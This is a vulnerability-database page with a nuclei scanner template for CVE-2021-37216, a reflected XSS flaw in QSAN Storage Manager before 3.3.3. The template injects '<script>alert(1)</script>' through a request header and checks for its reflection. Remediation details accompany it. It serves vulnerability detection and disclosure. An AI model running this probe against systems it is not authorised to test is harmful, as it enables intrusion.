Lucene search
K

QSAN Storage Manager <3.3.3 - Cross-Site Scripting

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 38 Views

QSAN Storage Manager 3.3.3 contains a reflected cross-site scripting vulnerability that allows for injection of JavaScript to access and modify specific data

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2021-37216
30 Jul 202107:52
attackerkb
Circl
CVE-2021-37216
2 Aug 202116:27
circl
CNNVD
QSAN Storage Manager 跨站脚本漏洞
2 Aug 202100:00
cnnvd
CVE
CVE-2021-37216
2 Aug 202111:18
cve
Cvelist
CVE-2021-37216 QSAN Storage Manager - Reflected Cross-Site Scripting
2 Aug 202111:18
cvelist
EUVD
EUVD-2021-23790
7 Oct 202500:30
euvd
NVD
CVE-2021-37216
2 Aug 202112:15
nvd
OSV
CVE-2021-37216
2 Aug 202112:15
osv
Prion
Cross site scripting
2 Aug 202112:15
prion
id: CVE-2021-37216

info:
  name: QSAN Storage Manager <3.3.3 - Cross-Site Scripting
  author: dwisiswant0
  severity: medium
  description: |
    QSAN Storage Manager before 3.3.3 contains a reflected cross-site scripting vulnerability.  Header page parameters do not filter special characters. Remote attackers can inject JavaScript to access and modify specific data.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade QSAN Storage Manager to version 3.3.3 or later to mitigate this vulnerability.
  reference:
    - https://www.twcert.org.tw/tw/cp-132-4962-44cd2-1.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-37216
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-37216
    cwe-id: CWE-79
    epss-score: 0.03186
    epss-percentile: 0.86528
    cpe: cpe:2.3:o:qsan:xn8024r_firmware:3.1.5:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: qsan
    product: xn8024r_firmware
  tags: cve,cve2021,xss,qsan,storage,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/http_header.php"

    headers:
      X-Trigger-XSS: "<script>alert(1)</script>"

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "!contains(tolower(header), 'x-xss-protection')"

      - type: word
        part: body
        words:
          - '"HTTP_X_TRIGGER_XSS":"<script>alert(1)</script>"'

      - type: word
        part: header
        words:
          - "text/html"
# digest: 490a0046304402206f6d27a0c5cc43d93f4c21fa4d432fac798b29e4cfcbef91e3db0e8fe5ad1cf70220469a4acd06e490af68538f042fb2b215bc0a8ccdb7369fd760bd043a9f8d46c8:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 24.3
CVSS 3.16.1
EPSS0.03186
38